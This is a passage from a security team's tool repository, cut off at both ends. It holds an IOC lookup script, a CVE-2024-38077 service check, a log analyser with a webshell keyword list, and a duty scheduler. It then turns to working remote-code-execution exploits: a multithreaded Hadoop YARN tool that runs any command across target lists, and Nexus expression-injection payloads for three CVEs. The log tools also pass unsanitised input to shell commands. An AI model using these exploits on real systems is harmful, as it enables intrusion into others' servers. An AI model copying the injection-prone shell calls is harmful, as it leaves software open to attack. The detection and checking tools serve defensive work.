| return None 179 | else: 180 | return None 181 | keylist = [] 182 | samples = 0 183 | urls = 0 184 | try: 185 | resolv_domains = len(_json['resolutions']) 186 | except Exception, reason: 187 | resolv_domains = 0 188 | for key in _json.keys(): 189 | if 'detected' in key and 'undetected' not in key: 190 | keylist.append(key) 191 | for key in keylist: 192 | if 'samples' in key: 193 | for stuff in _json[key]: 194 | if stuff["positives"] > 0: 195 | samples += 1 196 | if 'urls' in key: 197 | for stuff in _json[key]: 198 | try: 199 | if stuff['positives'] > 0: 200 | urls += 1 201 | except Exception, reason: 202 | if int(stuff[2]) > 0: 203 | urls += 1 204 | print "******************************************" 205 | print "检测时间: %s"%str(datetime.datetime.now()).split(".")[0] 206 | print "关联样本: %s"%str(samples) 207 | print "关联连接: %s"%str(urls) 208 | print "关联域名: %s"%str(resolv_domains) 209 | print "******************************************" 210 | 211 | 212 | if __name__ == "__main__": 213 | parser = OptionParser() 214 | parser.add_option("-f", "--file",dest="file",help="show process detail") 215 | parser.add_option("-a", "--addr",dest="addr",help="show process detail") 216 | parser.add_option("-d", "--domain",dest="domain",help="show process detail") 217 | parser.add_option("-u", "--url",dest="url",help="show process detail") 218 | (options, args) = parser.parse_args() 219 | obj = virustotal() 220 | if options.file not in [None,""]: 221 | obj.check_file(_file=options.file) 222 | exit(0) 223 | if options.addr not in [None,""]: 224 | obj.ioc_check(options.addr,"ip") 225 | exit(0) 226 | if options.domain not in [None,""]: 227 | obj.ioc_check(options.domain,"domain") 228 | exit(0) 229 | if options.url not in [None,""]: 230 | obj.ioc_check(options.url,"url") 231 | exit(0) 232 | -------------------------------------------------------------------------------- /Emergency/Windows/CVE-2024-38077_Check.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | setlocal 3 | 4 | set "serviceName=TermServLicensing" 5 | for /f "tokens=4" %%i in ('sc query %serviceName% ^| findstr /i "STATE"') do set serviceState=%%i 6 | 7 | if "%serviceState%"=="" ( 8 | echo [Must Be Secure] Service "%serviceName%" does not exist 9 | ) else ( 10 | echo [May Be Vulnerable] Service "%serviceName%" , Status [%serviceState%] 11 | ) 12 | endlocal 13 | exit /b 0 14 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 挖洞的土拨鼠 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /LogTools/AccessLogAnylast.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | from core.AccessApi import * 4 | from core.AccessCount import * 5 | from core.AccessDetail import * 6 | from core.AccessFreeze import * 7 | from core.AccessWebshell import * 8 | from optparse import OptionParser 9 | 10 | 11 | __author__ = "wechat:cr1914518025" 12 | __version__ = """ 13 | AccessLogAnylast V1.0.1 14 | python AccessLogAnylast.py -parameter-key [parameter-value] 15 | """ 16 | 17 | if __name__ == "__main__": 18 | parser = OptionParser() 19 | parser.add_option("-f", "--floder",dest="filepath",help="access log file path") 20 | parser.add_option("-t", "--time",dest="accesstime",help="set search time") 21 | parser.add_option("-d", "--date",dest="accessdate",help="set search date") 22 | parser.add_option("-c", "--count",action='store_true',dest="count",help="show count information") 23 | parser.add_option("-p", "--payload",dest="payload",help="set search payload") 24 | parser.add_option("-a","--address",dest="ipaddress",help="set search ipaddress") 25 | parser.add_option("-v", "--version",action='store_true',dest="version",help="show document") 26 | parser.add_option("-i","--detail",action='store_true',dest="detail",help="show detail") 27 | parser.add_option("-s","--shell",action='store_true',dest="webshell",help="show suspicious webshell") 28 | parser.add_option("-g","--ipflag",dest="ipposition",help="ip position in logfile") 29 | parser.add_option("-n","--name",dest="filename",help="filename flag") 30 | (options, args) = parser.parse_args() 31 | if options.version: 32 | print __version__ 33 | exit(0) 34 | if options.filename == None: 35 | options.filename == "access" 36 | if options.ipposition == None: 37 | options.ipposition = "1" 38 | if options.filepath == None: 39 | GetAllAccessLogFile(filepath=None,filename=options.filename) 40 | else: 41 | GetAllAccessLogFile(filepath=options.filepath,filename=options.filename) 42 | mylogfilelist = AccessLogFileList 43 | if options.count: 44 | if options.accesstime != None: 45 | for filename in mylogfilelist: 46 | GetAccessIPListByTime(filename,accesstime=options.accesstime,ipflag=options.ipposition) 47 | elif options.accessdate != None: 48 | for filename in mylogfilelist: 49 | GetAccessIPListByDate(filename,date=options.accessdate,ipflag=options.ipposition) 50 | else: 51 | for filename in mylogfilelist: 52 | #print options.ipposition 53 | GetAccessIPList(filename,ipflag=options.ipposition) 54 | exit(0) 55 | if options.detail: 56 | if options.ipaddress != None: 57 | if options.accesstime != None: 58 | for filename in mylogfilelist: 59 | GetAccessLogDetailByIPANDTime(filename,ipaddress=options.ipaddress,acstime=options.accesstime) 60 | elif options.accessdate != None: 61 | for filename in mylogfilelist: 62 | GetAccessLogDetailByIPANDDate(filename,ipaddress=options.ipaddress,date=options.accessdate) 63 | else: 64 | for filename in mylogfilelist: 65 | GetAccessLogDetailByIP(filename,ipaddress=options.ipaddress) 66 | else: 67 | for filename in mylogfilelist: 68 | GetAccessLogDetail(filename) 69 | exit(0) 70 | if options.webshell: 71 | for filename in mylogfilelist: 72 | WebShellScan(filename) 73 | exit(0) 74 | if options.payload != None: 75 | for filename in mylogfilelist: 76 | GetFreezeWebAttack(filename,options.payload) 77 | exit(0) 78 | -------------------------------------------------------------------------------- /LogTools/core/AccessApi.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | import os 4 | 5 | #定义全局变量和函数 6 | AccessLogFileList = [] 7 | 8 | def GetWorkPath(): 9 | return str(os.getcwd())+'/' 10 | 11 | def GetAllAccessLogFile(filepath=None,filename="access"): 12 | global AccessLogFileList 13 | if filepath == None: 14 | rootdir = GetWorkPath() 15 | else: 16 | rootdir = filepath 17 | for parents,dirs,filenames in os.walk(rootdir): 18 | for logfilename in filenames: 19 | if filename in logfilename.lower() and 'py' not in logfilename: 20 | AccessLogFileList.append(rootdir+logfilename) 21 | 22 | def TimeFormat(accesstime,timezone=None): 23 | monthlist = {"01":"Jan","02":"Feb","03":"Mar","04":"Apr","05":"May","06":"Jun","07":"Jul","08":"Aug","09":"Sep","10":"Oct","11":"Nov","12":"Dec"} 24 | accesstimelist = accesstime.split("-") 25 | year = accesstimelist[0] 26 | month = accesstimelist[1] 27 | day = accesstimelist[2] 28 | try: 29 | timedetail = accesstimelist[3] 30 | except: 31 | timedetail = '' 32 | if timezone != None: 33 | if 'e' in timezone: 34 | timezone = '+%s00' 35 | elif 'w' in timezone: 36 | timezone = '-%s00' 37 | else: 38 | timezone = None 39 | if timezone != None: 40 | return '%s/%s/%s:%s %s'%(day,monthlist[str(month)],year,timedetail,timezone) 41 | else: 42 | return '%s/%s/%s:%s'%(day,monthlist[str(month)],year,timedetail) 43 | -------------------------------------------------------------------------------- /LogTools/core/AccessCount.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | import os 4 | from AccessApi import * 5 | 6 | def GetAccessIPList(filename,ipflag='1'): 7 | AccessListIP = {} 8 | command = "cat %s | awk '{print $%s}' | sort -r | uniq -c | sort -r"%(filename,ipflag) 9 | result = os.popen(command) 10 | for line in result.read().split('\n'): 11 | line = line.lstrip() 12 | if line != "" and line != None: 13 | stuff = line.split(' ') 14 | key = int(stuff[0]) 15 | value = stuff[1] 16 | if key not in AccessListIP: 17 | AccessListIP[key] = [] 18 | AccessListIP[int(stuff[0])].append(stuff[1]) 19 | keylist = AccessListIP.keys() 20 | keylist = sorted(keylist) 21 | keylist.reverse() 22 | print "日志文件:%s"%filename 23 | for index,value in enumerate(keylist): 24 | for ip in AccessListIP[value]: 25 | print "排名:%s 访问源地址:%s 访问次数:%s"%(index+1,ip,value) 26 | 27 | 28 | 29 | def GetAccessIPListByTime(filename,accesstime,ipflag='1',timezone=None): 30 | AccessListIP = {} 31 | accesstime = TimeFormat(accesstime,timezone) 32 | command = "cat %s | grep '%s' | awk '{print $%s}' | sort -r | uniq -c | sort -r"%(filename,accesstime,ipflag) 33 | result = os.popen(command).read() 34 | for line in result.split('\n'): 35 | line = line.lstrip() 36 | if line != "" and line != None: 37 | stuff = line.split(' ') 38 | else: 39 | continue 40 | key = int(stuff[0]) 41 | value = stuff[1] 42 | if key not in AccessListIP: 43 | AccessListIP[key] = [] 44 | AccessListIP[int(stuff[0])].append(stuff[1]) 45 | keylist = AccessListIP.keys() 46 | keylist = sorted(keylist) 47 | keylist.reverse() 48 | print "日志文件:%s"%filename 49 | for index,value in enumerate(keylist): 50 | for ip in AccessListIP[value]: 51 | print "排名:%s 访问源地址:%s 访问次数:%s"%(index+1,ip,value) 52 | 53 | def GetAccessIPListByDate(filename,date,ipflag='1'): 54 | AccessListIP = {} 55 | accesstime = TimeFormat(date).split(":")[0] 56 | command = "cat %s | grep '%s' | awk '{print $%s}' | sort -r | uniq -c | sort -r"%(filename,accesstime,ipflag) 57 | result = os.popen(command).read() 58 | if result == '': 59 | return 60 | for line in result.split('\n'): 61 | line = line.lstrip() 62 | if line != "" and line != None: 63 | stuff = line.split(' ') 64 | key = int(stuff[0]) 65 | value = stuff[1] 66 | if key not in AccessListIP: 67 | AccessListIP[key] = [] 68 | AccessListIP[int(stuff[0])].append(stuff[1]) 69 | keylist = AccessListIP.keys() 70 | keylist = sorted(keylist) 71 | keylist.reverse() 72 | print "日志文件:%s"%filename 73 | for index,value in enumerate(keylist): 74 | for ip in AccessListIP[value]: 75 | print "排名:%s 访问源地址:%s 访问次数:%s"%(index+1,ip,value) 76 | -------------------------------------------------------------------------------- /LogTools/core/AccessDetail.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | import os 4 | from AccessApi import * 5 | 6 | def GetAccessLogDetail(filename): 7 | print "文件:%s"%filename 8 | with open(filename,'r') as fr: 9 | while True: 10 | line = fr.readline() 11 | if line in ["","\r\n",'\n',None]: 12 | break 13 | informationlist = line.split(" ") 14 | ip = informationlist[0] 15 | accesstime = informationlist[3].split('[')[-1].split(']')[0] 16 | method = informationlist[5][1:] 17 | action = informationlist[6] 18 | try: 19 | website = informationlist[10] 20 | except: 21 | website = '-' 22 | statuscode = informationlist[8] 23 | try: 24 | useragent = '' 25 | for index in range(11,25): 26 | useragent += informationlist[index] + ' ' 27 | except: 28 | pass 29 | string = """ 30 | *************************************************************************************************** 31 | 访问源IP地址:%s 32 | 访问时间:%s 33 | 请求方法:%s 34 | 访问行为:%s 35 | 响应状态:%s 36 | 站点信息:%s 37 | 客户端:%s 38 | *************************************************************************************************** 39 | """%(ip,accesstime,method,action,statuscode,website,useragent[0:-2]) 40 | print string 41 | 42 | def GetAccessLogDetailByIP(filename,ipaddress): 43 | print "文件:%s"%filename 44 | with open(filename,'r') as fr: 45 | while True: 46 | line = fr.readline() 47 | if line in ["","\r\n",'\n',None]: 48 | break 49 | if ipaddress not in line.split(" ")[0]: 50 | continue 51 | informationlist = line.split(" ") 52 | accesstime = informationlist[3].split('[')[-1].split(']')[0] 53 | method = informationlist[5][1:] 54 | action = informationlist[6] 55 | try: 56 | website = informationlist[10] 57 | except: 58 | website = '-' 59 | statuscode = informationlist[8] 60 | try: 61 | useragent = '' 62 | for index in range(11,25): 63 | useragent += informationlist[index] + ' ' 64 | except: 65 | pass 66 | string = """ 67 | *************************************************************************************************** 68 | 访问源IP地址:%s 69 | 访问时间:%s 70 | 请求方法:%s 71 | 访问行为:%s 72 | 响应状态:%s 73 | 站点信息:%s 74 | 客户端:%s 75 | *************************************************************************************************** 76 | """%(ipaddress,accesstime,method,action,statuscode,website,useragent[0:-2]) 77 | print string 78 | 79 | def GetAccessLogDetailByIPANDTime(filename,ipaddress,acstime): 80 | print "文件:%s"%filename 81 | acstime = TimeFormat(acstime) 82 | with open(filename,'r') as fr: 83 | while True: 84 | line = fr.readline() 85 | if line in ["","\r\n",'\n',None]: 86 | break 87 | if ipaddress not in line.split(" ")[0] or acstime not in line: 88 | continue 89 | informationlist = line.split(" ") 90 | ip = informationlist[0] 91 | accesstime = informationlist[3].split('[')[-1].split(']')[0] 92 | method = informationlist[5][1:] 93 | action = informationlist[6] 94 | try: 95 | website = informationlist[10] 96 | except: 97 | website = '-' 98 | statuscode = informationlist[8] 99 | try: 100 | useragent = '' 101 | for index in range(11,25): 102 | useragent += informationlist[index] + ' ' 103 | except: 104 | pass 105 | string = """ 106 | *************************************************************************************************** 107 | 访问源IP地址:%s 108 | 访问时间:%s 109 | 请求方法:%s 110 | 访问行为:%s 111 | 响应状态:%s 112 | 站点信息:%s 113 | 客户端:%s 114 | *************************************************************************************************** 115 | """%(ip,accesstime,method,action,statuscode,website,useragent[0:-2]) 116 | print string 117 | 118 | def GetAccessLogDetailByIPANDDate(filename,ipaddress,date): 119 | print "文件:%s"%filename 120 | date= TimeFormat(date).split(":")[0] 121 | with open(filename,'r') as fr: 122 | while True: 123 | line = fr.readline() 124 | if line in ["","\r\n",'\n',None]: 125 | break 126 | if ipaddress not in line.split(" ")[0] or date not in line: 127 | continue 128 | informationlist = line.split(" ") 129 | ip = informationlist[0] 130 | accesstime = informationlist[3].split('[')[-1].split(']')[0] 131 | method = informationlist[5][1:] 132 | action = informationlist[6] 133 | try: 134 | website = informationlist[10] 135 | except: 136 | website = '-' 137 | statuscode = informationlist[8] 138 | try: 139 | useragent = '' 140 | for index in range(11,25): 141 | useragent += informationlist[index] + ' ' 142 | except: 143 | pass 144 | string = """ 145 | *************************************************************************************************** 146 | 访问源IP地址:%s 147 | 访问时间:%s 148 | 请求方法:%s 149 | 访问行为:%s 150 | 响应状态:%s 151 | 站点信息:%s 152 | 客户端:%s 153 | *************************************************************************************************** 154 | """%(ip,accesstime,method,action,statuscode,website,useragent[0:-2]) 155 | print string 156 | -------------------------------------------------------------------------------- /LogTools/core/AccessFreeze.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | import os 4 | from AccessApi import * 5 | 6 | def GetFreezeWebAttack(filename,payload): 7 | command = "cat %s | grep %s | sort -r | uniq -c| sort -n"%(filename,payload) 8 | result = os.popen(command) 9 | print result.read() 10 | -------------------------------------------------------------------------------- /LogTools/core/AccessWebshell.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | 3 | import os 4 | import sys 5 | from AccessApi import * 6 | sys.path.append("../") 7 | from settings.settings import * 8 | 9 | 10 | keywords = [ 11 | "ghost", 12 | "gh0st", 13 | "=eval", 14 | "evil", 15 | "asp;", 16 | "php;", 17 | "jsp;", 18 | "aspx;", 19 | "jspx;", 20 | "php3;", 21 | "php4;", 22 | "php5;", 23 | ".asp/", 24 | ".aspx/", 25 | ".jsp/", 26 | ".jspx/", 27 | ".php/", 28 | "jpg/", 29 | "jpeg/", 30 | "png/", 31 | "php%00", 32 | "asp%00", 33 | "jsp%00", 34 | "aspx%00", 35 | "jspx%00", 36 | "php ", 37 | "asp ", 38 | "jsp ", 39 | "aspx ", 40 | "jspx ", 41 | ".txt/", 42 | "=system(", 43 | ".jsp.", 44 | ".php.", 45 | ".php3.", 46 | ".php4.", 47 | ".php5.", 48 | ".jspx.", 49 | ".asp.", 50 | ".aspx.", 51 | "cmd", 52 | "phpinfo", 53 | "=whoami", 54 | "=id", 55 | "=bash", 56 | "=ls", 57 | "..", 58 | "s=/index/\think", 59 | "call_user_func_array", 60 | 61 | ] 62 | 63 | def KeywordCheck(string): 64 | for word in keywords: 65 | if word in string.lower(): 66 | return (True,word) 67 | return (False,None) 68 | 69 | def GetPageAccessModel(filename): 70 | accessModel = {} 71 | keywordPage = [] 72 | with open(filename,'r') as fr: 73 | while True: 74 | line = fr.readline() 75 | informationlist = line.split(" ") 76 | if line in ["","\r\n",'\n',None]: 77 | break 78 | accesspage= informationlist[6] 79 | ret = KeywordCheck(accesspage) 80 | if ret[0]: 81 | keywordPage.append((accesspage,ret[1])) 82 | if accesspage not in accessModel: 83 | accessModel[accesspage] = {} 84 | ip = informationlist[0] 85 | if ip not in accessModel: 86 | accessModel[accesspage][ip] = 1 87 | accessModel[accesspage][ip] += 1 88 | return accessModel,keywordPage 89 | 90 | def GetSuspiciousPage(accessModel): 91 | PageAccessModel = [] 92 | for key in accessModel: 93 | ipcount = len(accessModel[key].keys()) 94 | accesscount = 0 95 | for ip in accessModel[key]: 96 | accesscount += accessModel[key][ip] 97 | PageAccessModel.append({"page":key,"ipcount":ipcount,"accesscount":accesscount}) 98 | resultlist = sorted(PageAccessModel ,key = lambda x:(x['ipcount'],x['accesscount']),reverse=False) 99 | for index,item in enumerate(resultlist): 100 | if int(index) > 10 or item["ipcount"] > WebShellScanAccessIPCount or item["accesscount"] > WebShellScanAccessCount: 101 | break 102 | print "可疑页面:%s"%item["page"],"可疑原因:访问率低" 103 | 104 | 105 | def WebShellScan(filename): 106 | ret1,ret2 = GetPageAccessModel(filename) 107 | for page in ret2: 108 | print "可疑页面:",page[0]," 可疑原因:",page[1] 109 | GetSuspiciousPage(ret1) 110 | -------------------------------------------------------------------------------- /LogTools/core/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 2 | "AccessApi", 3 | "AccessCount", 4 | "AccessDetail", 5 | "AccessFreeze", 6 | "AccessWebshell", 7 | ] 8 | -------------------------------------------------------------------------------- /LogTools/settings/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 2 | "settings" 3 | ] 4 | -------------------------------------------------------------------------------- /LogTools/settings/settings.py: -------------------------------------------------------------------------------- 1 | WebShellScanAccessIPCount = 5 2 | WebShellScanAccessCount = 50 3 | -------------------------------------------------------------------------------- /ManagementTools/WorkSchedule.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import datetime 3 | import chinese_calendar as calendar 4 | 5 | 6 | banner = """ 7 | ###################################################################################### 8 | # 欢迎使用 XXXXXXXXXXXXXXXXXXXXXX 节假日值班自动排班程序V2.0 # 9 | # 作者:b0b@c # 10 | # 支持福利假期设定 # 11 | ###################################################################################### 12 | """ 13 | worker_list= [] # worker_list = 14 | holiday_dict = { 15 | "New Year's Day":"元旦假期", 16 | "Spring Festival":"春节假期", 17 | "Tomb-sweeping Day":"清明假期", 18 | "Labour Day": "五一假期", 19 | "Dragon Boat Festival": "端午假期", 20 | "Mid-autumn Festival": "中秋假期", 21 | "National Day": "国庆假期", 22 | "5":"周六休假", 23 | "6":"周日休假" 24 | } 25 | qax_holidays= [] 26 | 27 | def set_qax_holidays(day_string): 28 | global qax_holidays 29 | try: 30 | year = int(day_string.split("-")[0]) 31 | month = int(day_string.split("-")[1]) 32 | day=int(day_string.split("-")[2]) 33 | qax_holidays.append((datetime.date(year, month, day),"福利休假")) 34 | return True 35 | except Exception as error: 36 | return False 37 | 38 | def get_holiday_name(day): 39 | name = calendar.get_holiday_detail(day)[1] 40 | name = name if name is not None else str(day.weekday()) 41 | return holiday_dict[name] 42 | 43 | def get_holidays(year): 44 | global qax_holidays 45 | qax_holidays = list(set(qax_holidays)) 46 | holidays = [] 47 | holiday_list = calendar.get_holidays(start=datetime.date(year,1,1), end=datetime.date(year,12,31)) 48 | for day in holiday_list: 49 | holidays.append((day, get_holiday_name(day))) 50 | holidays.extend(qax_holidays) 51 | holidays.sort() 52 | return holidays 53 | 54 | def work_schedule(year): 55 | holidays = get_holidays(year) 56 | with open("%s_OnDuty_Table.csv" % str(year), 'w') as file_writer: 57 | file_writer.writelines("值班日期,假期名称,值班方式,值班人\n") 58 | for index, holiday in enumerate(holidays): 59 | day_date = str(holiday[0]) 60 | day_name = holiday[1] 61 | work_style = "公司值班" if holiday[1] in ["周六休假", "周日休假"] else "远程值班" 62 | worker_index = index % 7 63 | worker_name = worker_list[worker_index] 64 | stuff = "%s,%s,%s,%s\n" % (day_date, day_name, work_style, worker_name) 65 | file_writer.writelines(stuff) 66 | 67 | 68 | if __name__ == "__main__": 69 | year = 2025 70 | print(banner) 71 | try: 72 | year = int(sys.argv[1]) 73 | except Exception as error: 74 | print("[-] 您输入的年份错误或官方尚未给出法定假期安排") 75 | sys.exit(0) 76 | while(True): 77 | day = input("[*] 请输入福利假日安排(按天输入一次一天),例如2025-02-06,不再继续请输入0:") 78 | if day == "0": 79 | break 80 | result = set_qax_holidays(day) 81 | if not result: 82 | print("[-] 输入错误,请重新输入") 83 | else: 84 | print("[+] 已添加,请输入下一天:") 85 | while(True): 86 | workers = input("[*] 请输入排班人员(姓名编号,逗号分割),例如 xx23,xx02,xxxx,...:") 87 | try: 88 | worker_list = workers.split(",") 89 | worker_list = list(set(worker_list)) 90 | try: 91 | worker_list.remove("") 92 | except Exception as error: 93 | pass 94 | break 95 | except Exception as error: 96 | print("[-] 输入错误,请重新输入") 97 | continue 98 | try: 99 | work_schedule(year) 100 | print("[+] 排班完成,请在本目录下查看%s_OnDuty_Table.csv文件" % str(year)) 101 | except Exception as error: 102 | print("[-] 发生错误: %s" %str(error)) 103 | 104 | -------------------------------------------------------------------------------- /POCS/HadoopYarnRCE.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import json 3 | import time 4 | import random 5 | import urllib3 6 | import datetime 7 | import requests 8 | import threading 9 | from optparse import OptionParser 10 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 11 | 12 | 13 | def write_log(content) -> None: 14 | timestamp: str = str(datetime.datetime.fromtimestamp(time.time())) 15 | with open("./running.log", 'a') as file_writer: 16 | content: str = str(content).replace("\n", "") 17 | message: str = "[%s] %s\n" % (timestamp, content) 18 | try: 19 | file_writer.write(message) 20 | except Exception as error: 21 | err_message: str = "[-][%s]Write log error!" % timestamp 22 | file_writer.write(err_message) 23 | 24 | 25 | class HadoopYarnRCEVulnerabilityExploiter(threading.Thread): 26 | def __init__(self, target: str, command: str): 27 | threading.Thread.__init__(self) 28 | self.target: str = target if target.endswith("/") else target + "/" 29 | self.command = command 30 | write_log("[-] Start To Exploit Hadoop Yarn RCE Vulnerability, Target is (%s)!" % str(self.target)) 31 | 32 | def run(self): 33 | request1_url: str = self.target + "ws/v1/cluster/apps/new-application" 34 | app_id: str = "" 35 | try: 36 | response1: requests.Response = requests.post(request1_url, verify=False, timeout=3) 37 | app_id = json.loads(response1.text)["application-id"] 38 | except Exception as error: 39 | write_log("[-] Error : %s" % str(error)) 40 | return 41 | if app_id == "": 42 | write_log("[-] Get Application ID error!") 43 | return 44 | app_name: str = "hello-" + str(random.randint(100, 500)) 45 | request2_url: str = self.target + "ws/v1/cluster/apps" 46 | data = { 47 | "application-id": app_id, 48 | "application-name": app_name, 49 | 'am-container-spec': { 50 | 'commands': { 51 | 'command': self.command, 52 | }, 53 | }, 54 | 'application-type': 'YARN', 55 | } 56 | try: 57 | response2: requests.Response = requests.post(request2_url, json=data, verify=False, timeout=3) 58 | print("[+] Target %s exploit Done!" % str(self.target) ) 59 | except Exception as error: 60 | write_log("[-] Error : %s" % str(error)) 61 | return 62 | 63 | 64 | class HadoopYarnRCEScannerCreater(object): 65 | def __init__(self, command: str, target: str, target_file: str = None, thread_count: int = 10): 66 | self.target_list: list = [] 67 | self.command = command 68 | self.thread_count: int = thread_count 69 | self.thread_size: int = 0 70 | self.thread_list: list = [] 71 | # start to handle target file 72 | if target_file is not None: 73 | try: 74 | with open(target_file, 'r') as file_reader: 75 | for line in file_reader: 76 | line = line.split("\n")[0].split("\r")[0] 77 | self.target_list.append(line) 78 | except Exception as error: 79 | print("[-] Get targets information error!") 80 | write_log(error) 81 | # start to handle target 82 | if target is not None: 83 | self.target_list.append(target) 84 | print("[+] Get targets finished!") 85 | 86 | def run(self) -> None: 87 | """Running verify functions with multi-thread!""" 88 | if len(self.target_list) <= 0: 89 | print("[-] No targets to scan!") 90 | return 91 | print("[+] Start scanning! Totally %s targets!" % str(len(self.target_list))) 92 | for target in self.target_list: 93 | if self.thread_size < self.thread_count: 94 | thread = HadoopYarnRCEVulnerabilityExploiter(target, self.command) 95 | self.thread_list.append(thread) 96 | self.thread_size += 1 97 | if self.thread_size == self.thread_count or self.thread_size == len(self.target_list) % self.thread_count: 98 | for thread in self.thread_list: 99 | thread.start() 100 | for thread in self.thread_list: 101 | thread.join() 102 | self.thread_list = [] 103 | self.thread_size = 0 104 | else: 105 | self.thread_list = [] 106 | self.thread_size = 0 107 | continue 108 | 109 | if __name__ == "__main__": 110 | parser = OptionParser("") 111 | parser.add_option("-t", dest="target", help="target to scan") 112 | parser.add_option("-f", dest="targetfile", help="target file to scan") 113 | parser.add_option("-s", dest="threadsize", help="size of threadpool?[10,15,20,25,30,35,40,45,50]") 114 | parser.add_option("-c", dest="command", help="command to execute") 115 | (options, args) = parser.parse_args() 116 | options.threadsize = int(options.threadsize) 117 | if options.threadsize not in [10, 15, 20, 25, 30, 35, 40, 45, 50]: 118 | options.threadsize = 10 119 | print("[+] Configure maximum thread count to %s!" % str(options.threadsize)) 120 | if options.command in ["", " ", None]: 121 | print("[-] Please input a command to execute!") 122 | sys.exit(0) 123 | scanner = HadoopYarnRCEScannerCreater(options.command, options.target, options.targetfile, options.threadsize) 124 | scanner.run() 125 | print("[+] Scanning finished! ByeBye!") 126 | -------------------------------------------------------------------------------- /POCS/NexusRCE.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import json 3 | import requests 4 | import urllib3 5 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 6 | 7 | 8 | def cve_2020_10204(target, command, cookie): 9 | header = {"X-Requested-With": "XMLHttpRequest", "X-Nexus-UI": "true", 10 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " 11 | "Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0", 12 | "Accept": "*/*", "Content-Type": "application/json", "Origin": target, "Referer": target, 13 | "Accept-Encoding": "gzip, deflate, br", 14 | "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Cookie": cookie, 15 | "NX-ANTI-CSRF-TOKEN": cookie.split(";")[0].split("=")[1]} 16 | 17 | data = { 18 | "action": "coreui_User", 19 | "method": "update", 20 | "data": [ 21 | { 22 | "userId": "admin", 23 | "version": "2", 24 | "firstName": "admin", 25 | "lastName": "User", 26 | "email": "admin@example.org", 27 | "status": "active", 28 | "roles": ["nxadmin$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('%s')}" % command] 29 | } 30 | ], 31 | "type": "rpc", 32 | "tid": 11 33 | } 34 | 35 | url = target + "/service/extdirect" 36 | print() 37 | response = requests.post(url, headers=header, data=json.dumps(data), verify=False) 38 | print(response.status_code) 39 | print(response.text) 40 | 41 | 42 | def cve_2020_10199(target, command, cookie): 43 | header = {"X-Requested-With": "XMLHttpRequest", "X-Nexus-UI": "true", 44 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " 45 | "Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0", 46 | "Accept": "*/*", "Content-Type": "application/json", "Origin": target, "Referer": target, 47 | "Accept-Encoding": "gzip, deflate, br", 48 | "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6", "Cookie": cookie, 49 | "NX-ANTI-CSRF-TOKEN": cookie.split(";")[0].split("=")[1]} 50 | 51 | data = { 52 | "name": "internal", 53 | "online": "true", 54 | "storage": { 55 | "blobStoreName": "default", 56 | "strictContentTypeValidation": "true" 57 | }, 58 | "group": { 59 | "memberNames": [ 60 | "$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('%s')}" % command] 61 | } 62 | } 63 | url = target + "/service/rest/beta/repositories/go/group" 64 | response = requests.post(url, headers=header, data=json.dumps(data), verify=False) 65 | print(response.status_code) 66 | print(response.text) 67 | 68 | 69 | def cve_2019_7238(target, command, cookie=None): 70 | header = { 71 | "X-Requested-With": "XMLHttpRequest", 72 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " 73 | "Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0", 74 | "Accept": "*/*", 75 | "Content-Type": "application/json", 76 | } 77 | 78 | data = { 79 | "action": "coreui_Component", 80 | "method": "previewAssets", 81 | "data": [ 82 | { 83 | "page": 1, 84 | "start": 0, 85 | "limit": 50, 86 | "sort": [{"property": "name", "direction": "ASC"}], 87 | "filter": [ 88 | {"property": "repositoryName", "value": "*"}, 89 | { 90 | "property": "expression", 91 | "value": "233.class.forName('java.lang.Runtime').getRuntime().exec('%s')" % command 92 | }, 93 | {"property": "type", "value": "jexl"} 94 | ] 95 | } 96 | ], 97 | "type": "rpc", 98 | "tid": 8 99 | } 100 | url = target + "/service/extdirect" 101 